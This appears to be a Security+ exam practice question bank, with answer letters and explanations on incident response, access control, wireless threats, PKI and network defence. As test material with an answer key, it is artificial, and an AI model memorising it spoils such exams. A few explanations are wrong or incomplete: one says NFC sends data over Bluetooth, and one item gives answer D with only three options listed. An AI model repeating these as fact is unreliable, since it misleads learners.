The helpdesk department for your organization reports that there are increased calls from clients reporting malware-infected computers. Which of the following steps of incident response is the most appropriate as a first response? Recovery Lessons learned Identification Containment Eradication

C. The first response within the incident response that should be taken in this scenario is identification. The malware needs to be identified, the computers affected need to be identified, and so on. Identification is usually the first step of an organization's incident response process. See the section "Incident Response Procedures" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: An example of the main phases of incident response (as listed in CompTIA Security+ exam objective 5.4) is as follows: 1. Preparation; 2. Identification; 3. Containment; 4. Eradication; 5. Recovery, and finally; 6. Lessons learned. (This list can vary from one organization to the next and from one standardization body to the next.) A pre-step to this list is preparation - being ready with tools, knowledge, and training before an incident occurs. Validation can occur during steps 5 through 7, depending on the type of validation. Follow-up can be considered part of the documenting and monitoring step.

An administrator configures Unix accounts to authenticate to a non-Unix server on the internal network. The configuration file incorporates the following information: DC=ServerName and DC=COM. Which service is being used? SAML RADIUS LDAP TACACS+

C. DC=ServerName and DC=COM imply the use of a Microsoft Windows domain controller (thus the DC parameter). Lightweight Directory Access Protocol (LDAP) is a directory access and authentication service used by Windows domain controllers, among other technologies. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: SAML (Security Assertion Markup Language) is used to address single sign-on (SSO) solutions between two providers; it is based on XML. RADIUS and TACACS+ are other types of authentication servers and are not necessarily Microsoft domain-based. (In fact, TACACS+ is Cisco-based.) Also, they are more often used for remote authentication, whereas the scenario implies a local authentication technology.

Which of the following threats is not associated with Bluetooth? Discovery mode Bluesnarfing Fraggle attack Bluejacking

C. A Fraggle attack is a type of denial-of-service attack that sends a large amount of UDP Echo traffic and is not associated with Bluetooth. See the section "Network Design" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: Discovery mode is a configuration setting that, if enabled, can allow security threats to access the Bluetooth-enabled device; some people consider it a threat unto itself. If Bluetooth devices are set to "discoverable," bluesnarfing and bluejacking attacks could possibly occur. Bluesnarfing is the unauthorized access of information through the Bluetooth connection and is generally the theft of data such as calendar information and phonebook contacts. Bluejacking is the sending of unsolicited messages to Bluetooth-enabled devices. One way to prevent both of these attacks is to set the Bluetooth device to "undiscoverable."

You have been contracted to conduct a forensics analysis on a server. Which of the following should you do first? Analyze temporary files Run an antivirus scan Obtain a binary copy of the system Search for spyware

C. A forensics investigator should first make a copy of the system and store it in a safe place, in case the system fails while the forensics investigation is carried out. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: After making a copy of the system, the forensics analysis might include the analysis of temporary files, and other files as well, running antivirus scans, and possibly searching for spyware. The forensics investigator will have a specific list of rules to go by when investigating what an attacker did.

Which of the following enables an attacker to hide the presence of malicious code by altering Registry entries? Worm Logic bomb Rootkit Trojan

C. A rootkit subverts an operating system by altering system processes and Registry entries. This can enable the attackers to hide the presence of their malicious code.

Which of the following does the discretionary access control model use to identify users who have permissions to a resource? Roles that users have in the organization Predefined access privileges Access control lists Security labels

C. Access control lists (ACLs) are used in the discretionary access control (DAC) model to identify users' permissions to resources. This is common in Windows client/server networks. By default, the owner assigns permissions to resources. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Role-based access control (RBAC) defines the roles that users have in an organization, based on sets of predefined permissions. Predefined access privileges can be found in mandatory access control (MAC) and RBAC models. Security labels are used in MAC.

You are in charge of your organization's backup plan. You need to make sure that the data backups are available in case of a disaster. However, you need to keep the plan as inexpensive as possible. Which of the following solutions should you implement? Implement a hot site Implement a cold site Back up data to removable media and store a copy offsite Implement a remote backup solution

C. Backing up data to removable media and storing it offsite is the least expensive solution. See the section "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: Hot sites and cold sites can cost the organization a lot of money, especially hot sites. Implementing a remote backup solution usually requires some sort of service with a monthly fee. You, as the network administrator, can back up data to removable media and store it offsite without incurring any other fees except for the cost of the removable media.

You are the network administrator for your organization and are in charge of many servers, including one web server. Which of the following is the best way to reduce vulnerabilities on your web server? Enable auditing and review log files Block DNS on port 80 Apply updates and patches Use a 24/7 packet sniffer

C. By applying updates and patches to the web server, you decrease the vulnerabilities on that server. You need to keep up to date with all the latest hotfixes and patches for your applications and operating systems. This is generally the best way to reduce vulnerabilities on any system or device. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Enabling auditing and reviewing log files is a smart idea, but it is not proactive. DNS uses port 53, but regardless the web server doesn't actually deal with DNS. A separate DNS server redirects clients to the web server. Packet sniffing is important when checking for vulnerabilities but is not the best way to reduce vulnerabilities; instead, it is a good way to find vulnerabilities. However, 24/7 packet sniffers that run all day can be resource-intensive and are not usually recommended.

You perform a risk assessment for your organization. What should you do during the impact assessment? Determine actions that can be taken to mitigate any potential threat Determine how likely it is that a threat might actually occur Determine the potential monetary costs related to a threat Determine how well the organization is prepared to manage the threat

C. During impact assessment, you want to know what kind of impact a threat can have, and potential monetary costs are a big portion of that impact on an organization. See the section "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: While determining the potential monetary costs, you do not assess potential threats, or how likely it is that a threat might occur. You do not assess how well the organization is prepared to manage the threat. You are more interested in monetary impact and the impact on servers; for example, loss of data availability and the impact on employees.

Malware can use virtualization techniques. Why would this be difficult to detect? A portion of the malware might have already been removed by an IDS. The malware might be using a Trojan. The malware could be running at a more privileged level than the computer's antivirus software. The malware might be running in the command-line.

C. By using privilege escalation, the malware can gain access to the system and possibly run at a higher privilege level than the computer's antivirus software. One of the ways to do this is through the use of virtualization techniques. See the section "Delivery of Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: If malware is removed, it is no longer a threat. You usually don't see "portions" of malware removed, but regardless this doesn't account for why the rest of the malware is difficult to detect. Trojans are fairly easy to detect if the AV software and/or IDS is up to date. Malware doesn't really run in the command line. It might be initiated from there, but it runs off the hard drive or memory.

What can happen if access mechanisms to data on an encrypted USB hard drive are not implemented correctly? Data on the USB drive can be corrupted. Data on the hard drive can be vulnerable to log analysis. The security controls on the USB drive can be bypassed. User accounts can be locked out.

C. If access mechanisms such as permissions and policies are not implemented correctly on a USB hard drive (or any hard drive for that matter), then those security controls for that drive can be bypassed by an attacker.

Which of the following is a secure wireless authentication method that uses a RADIUS server for authentication? CCMP WEP-PSK LEAP WPA2-PSK

C. LEAP (Lightweight Extensible Authentication Protocol) is Cisco's version of EAP. It allows for dynamic Wired Equivalent Privacy (WEP) keys and mutual authentication with a RADIUS server. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: The other answers do not use a RADIUS server; they all rely on the pre-shared key (PSK). Counter Mode CBC-MAC Protocol (CCMP) is a secure alternative to Temporal Key Integrity Protocol (TKIP), both of which are used with a protocol such as WPA or WPA2. Both WEP-PSK and WPA2-PSK use pre-shared keys (PSK) that the administrator enters locally at the WAP. However, WEP should not be used in this manner, as it is deprecated. It can, however, be used in conjunction with a RADIUS server. In that scenario, it is possible to use WEP in a secure fashion.

Which of the following is the most effective way of preventing adware? Install an antivirus program Install a host-based intrusion detection system Install a pop-up blocker Install a firewall

C. Pop-up blockers are the most effective way to prevent adware. Adware consists of the advertisements that pop up on your screen when you go to particular websites. Pop-up blockers are generally installed as add-ons to your web browser and are most often associated with the browser. See the section "Securing the Browser" in Chapter 5, "Application Security," for more information. Incorrect answers: Antivirus programs protect the computer from various types of malware. In some cases they include a pop-up blocker, but not always. The best way to be sure is to install a separate pop-up blocker directly into the web browser. Host-based intrusion detection systems look for patterns of particular types of attacks; an IDS might not stop pop-ups. A firewall blocks intrusions and closes off any open ports but does not detect pop-ups.

One of your database servers is mission-critical. You cannot afford any downtime. What is the best item to implement to ensure minimal downtime of the server and ensure fault tolerance of the data stored on the database server? UPS RAID Redundant server Spare parts

C. RAID (redundant array of inexpensive [or independent] disks) is a way to make data fault-tolerant. The best example would be to use RAID 5, RAID 6, or RAID 1. RAID 5 and 6 will have minimal downtime if a drive failure occurs; RAID 1 should have zero downtime if a drive failure occurs. See the section "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: A UPS (uninterruptible power supply) should be installed to protect from power outages but cannot protect from a hard drive error. A redundant server might or might not offer all the data fault tolerance that you want; it depends on how it is configured. Spare parts is a pretty vague answer. While it is important to have spare parts such as drive rails, drive frames, and so on, they probably won't help you in the case of drive failure.

The organization you work for, a video streaming company, hired a security consultant to find out how customer credit card information was stolen. He determined that it was stolen while in transit from gaming consoles. What should you implement to secure this data in the future? Firmware updates WAF TCP Wrapper IDS

C. TCP Wrapper is a host-based ACL program that provides protection against host name and host address spoofing in Linux and Unix environments. Most gaming consoles are Linux-based, and the video streaming servers they connect to are most likely Linux- or Unix-based as well. By using this program, rules can be configured to restrict access to TCP services. For example, attackers can easily determine when an unprotected Linux-based system is idle, and then attempt to access that system when it is unattended. The TCP Wrapper program acts as a pseudo-firewall in that it monitors incoming packets for authorization, thereby blocking the potential attacker. Programs used for streaming can be compiled with TCP Wrapper, and these can also be encrypted to further foil the would-be attacker. (Often this program is also referred to as TCP Wrappers.) By the way, credit card numbers should usually be stored in a transactional database that encrypts down to the database field level, not only the file level. Incorrect answers: Firmware updates are important for any system, but will not stop the problem being described. Some kind of software such as TCP Wrapper (an application layer program) is needed. A web application firewall (WAF) isn't the correct type of firewalling required by video streaming servers and the gaming consoles that connect to them. Plus, WAF along with IDS are solutions that are installed at the server side. This scenario calls for secure coding of the program that transmits data between the gaming consoles and the video streaming servers.

Which of the following attacks involves the interception of authentication traffic on a wireless network? Evil twin Replay attack IV attack Near field communication

C. The IV (initialization vector) attack is when an attacker deciphers the fixed-size input at the beginning of each WEP or WPA packet. WEP is much more susceptible. To avoid the attack, use WPA2. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: An evil twin is a rogue access point that is controlled by an attacker. It has the same name and configuration as one of the legitimate WAPs in an organization. A replay attack is a network attack in which data packets are repeated or delayed by an outside attacker. Near field communication (NFC) is a technology of mobile devices that allows them to automatically pair and transmit data via Bluetooth.

Which of the following best describes the baseline process of securing a device within a network infrastructure? Active prevention Enumerating Hardening Passive detection

C. The hardening of computers and network devices is part of the baseline process of securing those devices. See the section "Securing Wired Networks and Devices" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Active prevention can refer to network intrusion prevention systems that have not yet been hardened. Enumerating is the listing of possible security threats. Passive detection can refer to network intrusion detection systems that have not yet been hardened.

You are the security administrator working for a large corporation with many remote workers. You are tasked with deploying a remote access solution for both staff and contractors. Company management favors Remote Desktop Services because of its ease of use. Your current risk assessment suggests that you protect Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should you choose? A. Change remote desktop to a non-standard port, and implement password complexity for the entire Active Directory domain. B. Distribute new IPsec VPN client software to applicable parties, and then virtualize the remote desktop services functionality. C. Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication. D. Deploy a remote desktop server on your internal LAN, and require an Active Directory integrated SSL connection for access.

C. The key phrase here is that the risk assessment suggests that Windows should be protected from ingress traffic. That mainly implies the Windows clients, but could include the Windows server as well. Either way, to that end, one of the best ways to secure the server is to compartmentalize the remote desktop server on a screened subnet. Remember that contractors will be using this server too, so you don't want it to be anywhere near other important servers in your network, and possibly it should be isolated from any and all servers. The two-factor authentication is the icing on the cake, and is an excellent solution for remote workers where theft/loss of laptops can occur. All in all, it's the best of the listed answers. See the sections "Network Design" in Chapter 6, "Network Design Elements," and "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: "Change remote desktop to a non-standard port, and implement password complexity for the entire active directory domain." - Changing the remote desktop port is commonly implemented. For example, Microsoft remote desktop services uses 3389 inbound by default. Any attacker with a little experience knows this. So, changing the port is a good idea, but from the answer you can assume that the server is not in a screened subnet, DMZ, or similar protected area. Implementing password complexity for the Active Directory domain implies that the remote desktop server is located in the domain. You probably don't want that, or at least need to compartmentalize it in some way. Also, password complexity should already have been enabled, especially if this is an enterprise-level corporate network. "Distribute new IPsec VPN client software to applicable parties, and then virtualize the remote desktop services functionality." - It's kind of a given: you would have to distribute some kind of VPN client software in order for remote users to connect. 
However, IPsec implies an L2TP connection. There are better, more secure options such as a Cisco GRE tunnel, or an always-on SSL/TLS-based VPN. But that doesn't tackle the problem of server location. Also, "virtualize the remote desktop services functionality" is vague. Are we talking about the clients? Server? Both? Most likely clients, and virtualizing apps can have security benefits, but remote desktop client apps aren't commonly virtualized. And if this is a large enterprise network (implying lots of remote users), then a virtualized remote access server is probably not a good idea from a performance standpoint. "Deploy a remote desktop server on your internal LAN, and require an active directory integrated SSL connection for access." - We definitely don't want the remote access server on the LAN. No, it should be located somewhere more secure such as a DMZ, subnet, on the cloud, etc. Active Directory with SSL (meaning LDAP over SSL, port 636) is a good idea, but it again implies that the remote desktop server is on the LAN. Using a subnet or DMZ and using multifactor authentication dismisses most of the security issues associated with this incorrect answer's solution. Remember to carefully secure your remote desktop servers using a layered defense strategy, especially if that server requires communication with a domain controller or other server on the LAN.

Which of the following techniques supports availability when considering a vendor-specific vulnerability in critical industrial control systems? Verifying that antivirus definitions are up to date Deploying multiple firewalls at the network perimeter Incorporating diversity into redundant design Enforcing application whitelists

C. The key word in the question is availability. One of the best ways to encourage availability is to have redundancy. The more diverse the redundancy, the more fault tolerant the system. See the sections "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," and "Facilities Security" in Chapter 17, "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Some industrial control systems do not have the option to run AV software, but even if they did, AV software does not promote availability directly. It helps to secure against viruses and other malware, but it is not a method of fault tolerance. Multiple firewalls, for example a back-to-back perimeter configuration, will help to block network-based attacks, but also do not increase availability. Application whitelists, if not configured properly, could actually reduce availability. They are meant to restrict users to specific allowed applications.

You have found vulnerabilities in your SCADA system. Unfortunately, changes to the SCADA system cannot be made without vendor approval, which can take months to obtain. Which of the following is the best way to protect the SCADA system in the interim? Install a firewall in the SCADA network Update AV definitions on the SCADA system Deploy a NIPS at the edge of the SCADA network Enable auditing of accounts on the SCADA system

C. The only answer that does not require modifications to the actual SCADA (supervisory control and data acquisition) system and network is to deploy a NIPS (network intrusion prevention system) at the edge of the SCADA network. This will monitor for (and protect against) attacks on the SCADA system, but does not require that the SCADA system be modified. See the section "Facilities Security" in Chapter 17, "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Installing a firewall, updating AV definitions, and enabling auditing all require modifications to the SCADA system and network. While you wait for testing to be completed and obtain vendor approval, these avenues should be explored, but not implemented.

Which of the following can be implemented in hardware or software to protect a web server from XSS attacks? Flood guard IDS URL content filter WAF

D. A WAF (web application firewall) can be implemented as hardware or software. Among other things it can protect from XSS (cross-site scripting) and SQL injection attacks. The WAF can be an appliance, server software, or plug-in, and applies a set of rules to HTTP sessions to protect from various attacks. WebKnight and ModSecurity are examples of open source WAFs. Unlike other devices such as network intrusion detection systems (NIDSs), routers, and some firewalls, the WAF operates at layer 7 of the OSI model (application layer).

Which of the following characterizations best suits the term Java applets? Java applets include a digital signature. Java applets allow for customized controls and icons. Java applets need to have virtual machine web browser support. Java applets are the same as ActiveX controls.

C. Web browsers must have the capability to run Java applets in a virtual machine environment. If the virtual machine browser does not have the capability to do this, the Java applets cannot function. Virtual machines isolate an operating system or a web browser to secure them. However, they need to function properly; therefore, the virtual web browser must support Java applets. See the section "Securing the Browser" in Chapter 5, "Application Security," for more information. Incorrect answers: Java applets can be used for various things, but not all will include a digital signature, nor will all of them be used for customized controls and icons. The answers concerning digital signatures and customized controls are absolute, whereas Java applets will have many functions. Java applets are not the same as Microsoft's ActiveX controls.

Alice has read and write access to a database. Bob, her subordinate, only has read access. Alice needs to leave to go to a conference. Which access control type should you implement to trigger write access for Bob when Alice is not onsite? Discretionary access control Mandatory access control Rule-based access control Role-based access control Attribute-based access control

C. You would want to write a rule that automatically gives Bob write access to the database when Alice is gone. This is an example of rule-based access control. In this type of access control model, the security administrator writes the rule and allows the computer to automate the action of the rule when necessary. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Discretionary access control (DAC) is when the user has ownership of the resource in question and can create permissions as necessary. Mandatory access control (MAC) is similar to rule-based access control; in fact, rule-based access control is a subset of MAC. However, MAC is controlled by the system and does not work at this type of depth concerning rules. Role-based access control (RBAC) concerns users and their roles in the organization, including which groups they are members of, and applies rights and permissions accordingly. Attribute-based access control (ABAC) is a context-aware model that utilizes dynamic authentication and bases its decisions on the results of IF-THEN statements.

Which of the following tools require a computer with a network adapter that can be placed in promiscuous mode? Select 2. Password cracker Vulnerability scanner Network mapper Protocol analyzer Port scanner

CD

In an environment where the transmission and storage of PII data needs to be encrypted, what methods should you select? (Select the two best answers.) TFTP TKIP SSH PGP SNMP NTLM

CD. SSH (Secure Shell) can secure connections to remote machines and is instrumental in encrypting data in motion over the network. PGP (Pretty Good Privacy) encrypts data that is meant for transit via e-mail or for data that is meant to be at rest, or simply stored somewhere for an indeterminate amount of time. These are the only answers listed that will encrypt data and/or data sessions (and are not outdated). Incorrect answers: TFTP is used to send small and basic files in an unsecure manner between two hosts on a LAN. It does not encrypt data. The Temporal Key Integrity Protocol (TKIP) is used as a security protocol in wireless networks but is outdated and should be replaced by either Counter Mode CBC-MAC Protocol (CCMP) or Advanced Encryption Standard (AES). TKIP is insecure because it makes use of RC4, which is considered outdated. The Simple Network Management Protocol (SNMP) concerns the monitoring of networks and network devices and hosts. NTLM (NT LAN Manager hash) is a cryptographic hashing protocol used with Windows passwords. This is also outdated and should be replaced with NTLMv2.

Your organization uses a SOHO wireless router all-in-one device. The network has five wireless BYOD users and two web servers that are wired to the network. What should you configure to protect the servers from the BYOD users' devices? (Select the two best answers.) Implement EAP-TLS Change the default HTTP port Create a VLAN for the servers Deny incoming connections to the outside router interface Disable physical ports Create an ACL to access the servers

CF. If the servers and the BYOD users are on the same network, then the BYOD users could easily access the servers, regardless of whether a computer is connected in a wired fashion or wireless fashion by default. So to protect the servers from the users' mobile devices, you could first create a virtual LAN (VLAN) for the servers. This VLAN would separate the servers and you could then control who is allowed access to the servers via access control lists (ACLs) within the firewall portion of the SOHO all-in-one wireless router. If the SOHO router supported it, you could also place the web servers in a DMZ. Incorrect answers: The EAP-TLS authentication scheme should not be necessary for this scenario; it is used, for example, to authenticate wireless clients to a wireless network, which was not specified in the question. Changing the default HTTP port (which is normally 80) would cause your Internet guests some difficulty in finding the web servers, and is not necessary in this scenario either. Denying incoming connections to the outside router interface would also make it difficult for Internet users to access the web servers, and is therefore not recommended. If a physical port is disabled, anything connected to that port will be effectively offline. This also compounds the issue instead of solving it.

In which of the following phases of identification and authentication does proofing occur? Verification Authentication Authorization Identification

D. Identification is the phase in which identity proofing occurs. Identity proofing is an initial validation of an identity. See the section "Physical Security" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Authentication happens afterward, granting access to a network or building. Then authorization occurs when a person is approved access to specific resources. Verification of identification is important within authentication schemes; for example, a security guard may be required to run checks of employees' IDs.

One of your co-workers has been issued a new smart card because the old one has expired. The co-worker can connect to the computer network but is unable to send digitally signed or encrypted e-mail. What does the security administrator need to perform? Make certificates available to the operating system Recover the previous smart card certificates Remove all previous smart card certificates from the local certificate store Publish new certificates to the global address list

D. A certificate is required to send digitally encrypted and signed e-mail. Certificates based on a smart card must be published to the global address list when using a Microsoft Exchange Server and Microsoft Outlook client for e-mail. Expired smart cards (and their certificates) will not function; expired smart cards' certificates should be revoked. See the section "Security Protocols" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: Certificates are not published to the operating system; they are published to the e-mail application. You cannot recover the previous smart card certificates because those have expired and will be on the revoked list. Removing the previous smart card certificates is a good idea, but won't help with the current problem.

Your LAN is isolated from the Internet by a perimeter network. You suspect that someone is trying to gather information about your LAN. The IT director asks you to gather as much information about the attacker as possible while preventing the attacker from knowing that the attempt has been detected. What is the best method to accomplish this? Deploy a DMZ Deploy a proxy server in the perimeter network Deploy a NIPS outside the perimeter network Deploy a honeypot in the perimeter network

D. A honeypot can be used to lure attackers in and trap them while you analyze their methods. The honeypot is usually placed within the perimeter network, which is the DMZ. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Proxy servers are usually not placed in the perimeter network; they act as go-betweens, or mediators, for users on the LAN and servers on the Internet. A NIPS (network intrusion prevention system) can be placed in or out of a perimeter network, but it does not lure in attackers; instead, a NIPS attempts to prevent attacks from happening.

A systems administrator requires an all-in-one device that combines various levels of defense into one solution. She requires a single device that sits last on the network before the Internet connection. Which of the following would be the best solution? Circuit-level gateway DLP WIDS UTM

D. A unified threat management (UTM) device is an all-in-one device that combines the various levels of defense into one solution. Often, this is a single device that sits last on the network before the Internet connection. See the section "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A circuit-level gateway works at the session layer of the OSI model, and applies security mechanisms when a TCP or UDP connection is established; it acts as a go-between for the transport and application layers in TCP/IP. Circuit-level gateways hide information about the private network, but they do not filter individual packets. Data loss prevention (DLP) systems are designed to protect data by way of content inspection. They are meant to stop the leakage of confidential data, often concentrating on communications. A WIDS is a wireless IDS that monitors the radio spectrum for unauthorized access and rogue access points.

A systems administrator must configure access to the corporate network such that users always have access without the need to periodically disconnect and reconnect. Which of the following best describes the type of connection that should be configured? Federated identity management Kerberos Generic Routing Encapsulation Always-on VPN PPTP

D. Always-on VPN functionality is where a user can always have access via the VPN without the need to periodically disconnect and reconnect. This is usually done with the aid of SSL/TLS. Compare this to other VPN methods such as L2TP and PPTP where the user may need to disconnect and reconnect. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: Federated identity management is when a user's identity and attributes are shared across multiple identity management systems. These various systems can be owned by one organization; for example, Microsoft offers the Forefront Identity Manager (FIM) software—a state-based identity management product—which can control user accounts across local and cloud environments. Kerberos is an authentication protocol that enables computers to prove their identity to each other in a secure manner. It is used most often in a client-server environment; the client and the server both verify each other's identity. Cisco systems use the Generic Routing Encapsulation (GRE) protocol to encapsulate routing information that passes between VPN-enabled connected networks that use PPTP or IPsec. Point-to-Point Tunneling Protocol (PPTP) is still commonly used (on SOHO routers and elsewhere) for VPNs, but it is an older method that has security flaws. Many organizations now opt for SSL/TLS-based VPNs.

In the event of a short-term power loss to the server room, what should be powered on first in order to establish DNS services? Apache server Exchange server RADIUS BIND server

D. BIND stands for Berkeley Internet Name Domain. It is the most widely used DNS server on the Internet and was originally designed at the University of California at Berkeley. It normally runs on Unix systems. This would have to be booted first in order to establish DNS services; in fact, it is the only server listed that will establish DNS services in this scenario. Incorrect answers: Apache is a type of web server. Exchange is a type of e-mail server. RADIUS is an authentication server. None of these establish DNS services, unless DNS has also been loaded on those computers separately.

Which of the following statements best defines a computer virus? It is a find mechanism, initiation mechanism, and can propagate. It is a search mechanism, connection mechanism, and can integrate. It is a learning mechanism, contamination mechanism, and can exploit. It is a replication mechanism, activation mechanism, and has an objective.

D. Computer viruses are code that acts as a replication mechanism, replicating from file to file. They are activated by users who execute the virus. Viruses have an objective, which could be one of many malicious functions. Incorrect answers: Viruses do not propagate from computer to computer, but worms do. Viruses are not search or learning mechanisms either.

Which of the following defines the main difference between identification and authentication? Authentication verifies the identity of a user requesting credentials, whereas identification verifies a set of credentials. Authentication verifies a set of credentials, whereas identification verifies the identity of the network. Authentication verifies a user ID that belongs to a specific user, whereas identification verifies the identity of a user group.

D. Explanation: Identification is when a person is in a state of being identified. It can also be described as something that identifies a person, such as an ID card. Authentication is when a person's identity is confirmed or verified through the use of a specific system based on credentials.

Password-cracking tools are easily available over the Internet. Which of the following is a password-cracking tool? AirSnort Nessus Wireshark John the Ripper

D. John the Ripper is a password-cracking tool, otherwise known as a password analysis or recovery tool; it all depends on who uses the tool. This particular tool can do dictionary attacks, brute-force attacks, and cryptanalysis attacks on passwords. See the section "Assessing Vulnerability with Security Tools" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: AirSnort is a wireless network finder. Nessus is a vulnerability scanner, and Wireshark is a protocol analyzer, otherwise known as a network sniffer.

Study the following items carefully. Which one permits a user to "float" a domain registration for a maximum of 5 days? DNS poisoning Domain hijacking Domain spoofing Kiting DNS amplification

D. Kiting is when a person floats a domain for up to 5 days. Domain name kiting is the process of deleting a previously registered domain name within the 5-day grace period given to the user by the domain registrar. This grace period is also known as an add grace period, or AGP. The person doing the kiting will immediately reregister the domain name for another 5-day period and continue the process until the domain name is sold for a profit. Otherwise, the person will continue to use the domain without ever paying for it. See the section "Malicious Attacks" in Chapter 7, "Networking Protocols and Threats," for more information. Incorrect answers: DNS poisoning is the modification of name resolution information in a DNS server's cache. Domain hijacking is the process by which the registration of a domain name is transferred without the permission of the owner. Domain spoofing is attempting to make users think that your domain is actually another one; this is commonly done with similar-looking domain names. DNS amplification is an attack that targets servers and network devices by sending bulk requests that are smaller than the responses.

Which of the following threats has the highest probability of being increased by the availability of devices such as USB flash drives on your network? Introduction of new data on the network Increased loss of business data Loss of wireless connections Removal of PII data

D. Personally identifiable information (PII) and other sensitive data can easily be removed from the network through the use of USB flash drives and other similar removable media. This is the most important threat you need to be aware of that could increase due to the use of these devices. See the section "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: Although new data on the network might be introduced, or business data might be lost, the most common threat when USB flash drives are available is the removal of PII data.

What kind of attack enables an attacker to access administrator-level resources using a Windows service that uses the local system account? Trojan Spyware Spam Privilege escalation

D. Privilege escalation is the act of gaining a higher level of access to resources. It is sometimes done by using the local system account in Windows.

Identifying residual risk is considered to be the most important task when dealing with which of the following? Risk acceptance Risk deterrence Risk avoidance Risk mitigation

D. Risk acceptance, also known as risk retention, is the amount of risk that an organization is willing to allow after risk has been reduced as much as possible. The actual amount is known as residual risk; the amount left over after a detailed security plan has been implemented. See the section "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: Risk deterrence involves implementing systems and policies that mitigate risk. Risk avoidance is when a proposed security plan is not carried out because the risk factor is too great. Risk mitigation is the attempt to eliminate risk, similar to risk reduction.

What two security precautions can best help to protect against wireless network attacks? Authentication and WEP Access control lists and WEP Identification and WPA2 Authentication and WPA

D. The best two security precautions are authentication and WPA. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Although WPA2 is more secure than WPA, the term "identification" is not correct. WEP is a deprecated wireless encryption protocol and should be avoided.

You are in the middle of the information gathering stage of the planning and deployment of a role-based access control model. Which of the following is most likely required? Clearance levels of personnel Rules under which certain systems can be accessed Group-based privileges already in place Matrix of job titles with required privileges

D. The information gathering stage of a task such as this requires a matrix of job titles and required privileges, preferably something in spreadsheet format that can easily be entered into the system quickly. Each employee in the matrix would fall into a specific role in the RBAC model. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: The important information here for the RBAC model is the names of employees, job titles, and their required privileges. The clearance levels are also important, but they should be translated into required privileges before they are sent to the security administrator planning the RBAC model. Rules under which certain systems can be accessed aren't required here; besides, that would be an example of rule-based access control, not role-based access control. Any group-based privileges already in place will most likely be wiped clean once the new RBAC system is up and running, so they probably aren't necessary either.

You've created a baseline for your Windows Server file server. Which of the following tools can best monitor changes to your system baseline? Key management software Resource planning software Antivirus software Performance monitoring software

D. Use performance monitoring software to monitor for any changes to your system baseline. CPU spikes, higher levels of hard drive access, and other objects within your server performing other than normal can be detected by the performance monitoring software. See the section "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Key management software manages the deployment of encrypted keys and certificates. Resource planning software is for planning for fault tolerance and disaster recovery. Antivirus software protects and prevents against malware attack.

The IT director asks you to verify that the organization's virtualization technology is implemented securely. What should you do? Verify that virtual machines are multihomed Perform penetration testing on virtual machines Subnet the network so that each virtual machine is on a different network segment Verify that virtual machines have the latest updates and patches installed

D. Verify that virtual machines have the latest updates and patches installed. Explanation: One of the most important security precautions you can take is to install the updates and patches. This concept applies to regular operating systems, applications, and virtual machines.

A security administrator is required to submit a new CSR to a CA. What is the first step? Generate a new private key based on AES Generate a new public key based on RSA Generate a new public key based on AES Generate a new private key based on RSA

D. When a person is required to submit a CSR (certificate signing request) to a CA (certificate authority), the first step - before generating the CSR - is to create a private key. This will be an asymmetric key such as RSA, commonly a 2048-bit key. (In fact, since the end of 2013 it is mandated that the key be 2048-bit or larger.) The next steps are to generate the CSR, submit the CSR for signing (the crucial part of the process), and finally install the signed certificate. It is important to keep the original RSA private key safe and secure. No one, including the CA, should know the RSA key. The CA should only know the CSR generated, which is based on the private RSA key. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: Symmetric keys such as AES are not used for this process; asymmetric keys such as RSA are the standard. The security administrator must use and keep safe a private key that only he or she knows. Later, when people connect to the organization's website or network, they will make use of the public key portion.

A security auditing consultant has completed a security assessment and gives the following recommendations: 1. Implement fencing and additional lighting around the perimeter of the building. 2. Digitally sign new releases of software. Categorically, what is the security consultant recommending? (Select the two best answers.) Encryption Availability Confidentiality Safety Fault tolerance Integrity

DF. The fencing and additional lighting are for employee safety, especially at night. Digitally signing software, or anything else, speaks to keeping the integrity of the software intact. Hashing is another concept that could be implemented. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," and "Physical Security" in Chapter 10, "Physical Security and Authentication Models," for more information.

(messer) Which of the following would be most responsible for data accuracy, privacy, and security, associating sensitivity labels to data, and ensuring compliance with any applicable laws and standards? Data custodian Data owner Privacy officer System administrator Data steward

E

